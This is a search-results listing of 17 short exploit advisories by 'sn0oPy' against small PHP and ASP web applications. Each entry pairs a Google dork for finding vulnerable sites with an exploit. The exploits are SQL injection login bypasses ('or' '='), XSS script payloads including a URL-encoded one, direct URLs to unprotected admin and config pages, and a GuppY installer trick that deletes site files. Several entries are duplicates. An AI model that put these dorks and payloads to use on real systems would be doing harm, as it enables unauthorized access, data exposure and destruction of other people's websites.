17 matches found
Annuaire Téléphonique v1.0 Sensetive Files (MDP)
Annutel - Annuaire Tlphonique v1.0 Sensetive Files MDP By : sn0oPy Risk : Low Dork : inurl:"annuaire/annuaire.php3?task=1" exploit : Found the http://Siter/annuaire/add/annuaire.php3? Page, get the source, and find the “f code !=” for password, it’s all ; contact : sn0oPy at avenir-geopolitique d...
GuppY v4.0 remote del files/index
GuppY v4.0 remote del files/index By : sn0oPy Risk : high site : http://www.freeguppy.org/ Dork : inurl:"/guppy/index.php" exploit : just add install/install.php to the script folder http://www.target.ma/guppy/install/install.php choose "Installation propre" next choose "Suppression des fichiers...
dynaliens v2.0/v2.1 bypass admin authentification + XSS
dynaliens v2.0/v2.1 bypass admin authentification + XSS By : sn0oPy Risk : high site : http://www.spiderforce.fr.st/ Dork : inurl:"/dynaliens" exploit : normaly when we add "/admin" to the link, like that http://www.target.ma/dynaliens/admin we are face to face with a restricted zone area, but if...
bj-xss.txt
BJ Webring XSS By : sn0oPy Risk : high exploit : just inject any script on the add link menu : http://www.target.ma/webring/formulaire.php Dork : intitle:".: index webring :." contact : [email protected] greetz : subzero, http://forums.avenir-geopolitique.net. reference :...
jbrowser.txt
JBrowser acces to admin/config files By : sn0oPy Risk : high Dork : inurl:"JBrowser/index.php" exploit : juste replace the http://www.target.ma/jbrowser/index.php by http://www.target.ma/jbrowser/admin/ contact : [email protected] greetz : subzero, Avg...
JBrowser acces to admin/config files
JBrowser acces to admin/config files By : sn0oPy Risk : high Dork : inurl:"JBrowser/index.php" exploit : juste replace the http://www.target.ma/jbrowser/index.php by http://www.target.ma/jbrowser/admin/ contact : [email protected] greetz : subzero, Avg...
cedstat131-xss.txt
CedStat v1.31 XSS By : sn0oPy Risk : low site : http://cedtat.free.fr exploit : http://www.target.ma/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E Dork : inurl:"/cedstat/" contact : [email protected] greetz : subzero,...
nabopoll 1.2 - Remote Unprotected Admin Section
nabopoll 1.1.2 sensitive file admin without password By : sn0oPy Risk : high site : http://nabocorp.com/ Dork : inurl:"nabopoll/" exploit : acces without password to : http://target/nabopoll/admin/configedit.php http://target/nabopoll/admin/templateedit.php...
nabopoll 1.2 Remote Unprotected Admin Section Vulnerability
Exploit for unknown platform in category web applications =========================================================== nabopoll 1.2 Remote Unprotected Admin Section Vulnerability =========================================================== nabopoll 1.1.2 sensitive file admin without password By :...
Allons_voter Version 1.0 xss and admin votes
Allonsvoter Version 1.0 xss and admin votes wihtout password By : sn0oPy Risk : medium Dork : inurl:"Allonsvoter" exploit : Be admin : http://www.target.com/Allonsvoter/menu.html replace it by http://www.target.com/Allonsvoter/adminajouter.php or http://www.target.com/Allonsvoter/adminsupprimer.p...
mcRefer SQL injection
mcRefer SQL injection By : sn0oPy Risk : high site : http://www.phpforums.net Dork : intitle:"mcRefer" exploit : http://www.target.com/mcRefer/install.php contact : [email protected] greetz : subzero, Avg Teamforums.avenir-geopolitique.net. Rйference :...
Les News v2.2 [Admin news without password]
Les News v2.2 Admin news without password By : sn0oPy Risk : verry high site : http://stombi.free.fr/ exploit : add to the /lesnews/ rep adminews/indexfr.php3 exemple : http://www.test.ma/lesnews/lesnewsfr.php3 http://www.test.ma/lesnews/adminews/indexfr.php3 Dork : inurl:"/lesnews/lesnewsfr.php3...
MysearchEngine XSS
MysearchEngine XSS By : sn0oPy Risk : low site : http://homeproduction.free.fr/ exploit : scriptalert'test'/script Dork : inurl:"MysearchEngine" contact : [email protected] greetz : subzero, http://forums.avenir-geopolitique.net. reference :...
rblasp-sql.txt
RBL - ASP scripts with db SQL injection By : sn0oPy Risk : high Site : http://www.aspside.com Dork : intitle:"RBL - ASP" exploit : user = 'or' '=' pass = 'or' '=' contact : [email protected] greetz : subzero, Avg Teamhttp://forums.avenir-geopolitique.net reference =...
RBL - ASP (scripts with db) SQL injection
RBL - ASP scripts with db SQL injection By : sn0oPy Risk : high Site : http://www.aspside.com Dork : intitle:"RBL - ASP" exploit : user = 'or' '=' pass = 'or' '=' contact : [email protected] greetz : subzero, Avg Teamhttp://forums.avenir-geopolitique.net reference =...
admentor-sql.txt
AdMentor banners admin SQL injection By : sn0oPy Risk : high Site : http://www.aspcode.net/products/admentor Dork : inurl:"admentor/admin" exploit : UserID = 'or' '=' Password = 'or' '=' contact : [email protected] greetz : subzero, Avg Teamhttp://forums.avenir-geopolitique.net. references :...
golden book XSS
golden book XSS By : sn0oPy Risk : high Site : http://triviere.free.fr/ exploit : any site scripting scriptalert'tested by sn0oPy'/script for exemple Dork : inurl:"/goldenbook/index.php" contact : [email protected] greetz : subzero, Avg Teamforums.avenir-geopolitique.net...